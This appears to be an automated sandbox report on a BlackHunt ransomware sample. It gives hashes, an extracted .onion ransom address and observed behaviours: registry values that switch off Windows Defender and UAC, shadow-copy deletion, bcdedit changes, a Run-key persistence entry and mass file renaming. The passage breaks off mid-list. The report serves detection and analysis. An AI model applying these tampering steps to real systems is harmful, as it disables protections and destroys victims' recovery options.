Analysis
-
max time kernel
171s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:57
Static task
static1
Behavioral task
behavioral1
Sample
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
Resource
win10v2004-20231215-en
General
-
Target
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
-
Size
707KB
-
MD5
5d53db9aa7f297cb21ff6018979aaa71
-
SHA1
f8f996591327a6cd0439455a1ee6c077b1355ef1
-
SHA256
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7
-
SHA512
62200d005f5f65bd12a47ce3d3b6a5ffc7590c1c41efd3e3e8099bb0356b66fc778522626765350dbf9d9ea9e6079aaef2754578e8f04308f3410b4e577d1dea
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1d81vnh:6uaTmkZJ+naie5OTamgEoKxLWgxh
Malware Config
Extracted
\Device\HarddiskVolume1\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5516 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3852 bcdedit.exe 5220 bcdedit.exe -
Renames multiple (1476) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5524 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\W: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\G: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\X: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\N: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\H: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\V: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\E: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\Y: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\A: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\B: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\M: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\Q: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\U: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\S: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\Z: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\K: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\L: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\R: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\T: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\O: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\J: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-default_32.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_auditreport_18.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\7-Zip\License.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter_18.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\colorimaging.md cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\ui-strings.js cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\acrobat_pdf.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaSansRegular.ttf cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\comment.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\PublishShow.3gpp cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder-default.svg cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\he-il\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2944 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3392 vssadmin.exe 1192 vssadmin.exe 4888 vssadmin.exe 2204 vssadmin.exe 1260 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeRestorePrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeBackupPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeTakeOwnershipPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeAuditPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeSecurityPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeIncBasePriorityPrivilege 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeBackupPrivilege 4412 vssvc.exe Token: SeRestorePrivilege 4412 vssvc.exe Token: SeAuditPrivilege 4412 vssvc.exe Token: SeBackupPrivilege 3272 wbengine.exe Token: SeRestorePrivilege 3272 wbengine.exe Token: SeSecurityPrivilege 3272 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4020 wrote to memory of 4296 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 85 PID 4020 wrote to memory of 4296 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 85 PID 4020 wrote to memory of 4696 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 169 PID 4020 wrote to memory of 4696 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 169 PID 4020 wrote to memory of 952 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 89 PID 4020 wrote to memory of 952 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 89 PID 4020 wrote to memory of 4420 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 174 PID 4020 wrote to memory of 4420 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 174 PID 4020 wrote to memory of 3216 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 91 PID 4020 wrote to memory of 3216 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 91 PID 4020 wrote to memory of 2576 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 95 PID 4020 wrote to memory of 2576 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 95 PID 4020 wrote to memory of 4520 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 97 PID 4020 wrote to memory of 4520 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 97 PID 4020 wrote to memory of 4240 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 101 PID 4020 wrote to memory of 4240 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 101 PID 952 wrote to memory of 3136 952 cmd.exe 104 PID 952 wrote to memory of 3136 952 cmd.exe 104 PID 4420 wrote to memory of 4496 4420 Conhost.exe 165 PID 4420 wrote to memory of 4496 4420 Conhost.exe 165 PID 4296 wrote to memory of 2892 4296 cmd.exe 99 PID 4296 wrote to memory of 2892 4296 cmd.exe 99 PID 4696 wrote to memory of 2460 4696 reg.exe 163 PID 4696 wrote to memory of 2460 4696 reg.exe 163 PID 2576 wrote to memory of 3180 2576 cmd.exe 108 PID 2576 wrote to memory of 3180 2576 cmd.exe 108 PID 4020 wrote to memory of 3388 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 105 PID 4020 wrote to memory of 3388 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 105 PID 3216 wrote to memory of 2908 3216 cmd.exe 164 PID 3216 wrote to memory of 2908 3216 cmd.exe 164 PID 4020 wrote to memory of 3392 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 190 PID 4020 wrote to memory of 3392 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 190 PID 4020 wrote to memory of 2980 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 194 PID 4020 wrote to memory of 2980 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 194 PID 4520 wrote to memory of 4812 4520 cmd.exe 109 PID 4520 wrote to memory of 4812 4520 cmd.exe 109 PID 4020 wrote to memory of 1788 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 112 PID 4020 wrote to memory of 1788 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 112 PID 4020 wrote to memory of 4984 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 129 PID 4020 wrote to memory of 4984 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 129 PID 4020 wrote to memory of 2220 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 196 PID 4020 wrote to memory of 2220 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 196 PID 3388 wrote to memory of 4044 3388 cmd.exe 127 PID 3388 wrote to memory of 4044 3388 cmd.exe 127 PID 4240 wrote to memory of 4832 4240 cmd.exe 125 PID 4240 wrote to memory of 4832 4240 cmd.exe 125 PID 4020 wrote to memory of 2412 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 115 PID 4020 wrote to memory of 2412 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 115 PID 4020 wrote to memory of 3040 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 118 PID 4020 wrote to memory of 3040 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 118 PID 4020 wrote to memory of 640 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 120 PID 4020 wrote to memory of 640 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 120 PID 4020 wrote to memory of 3164 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 121 PID 4020 wrote to memory of 3164 4020 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 121 PID 3392 wrote to memory of 1336 3392 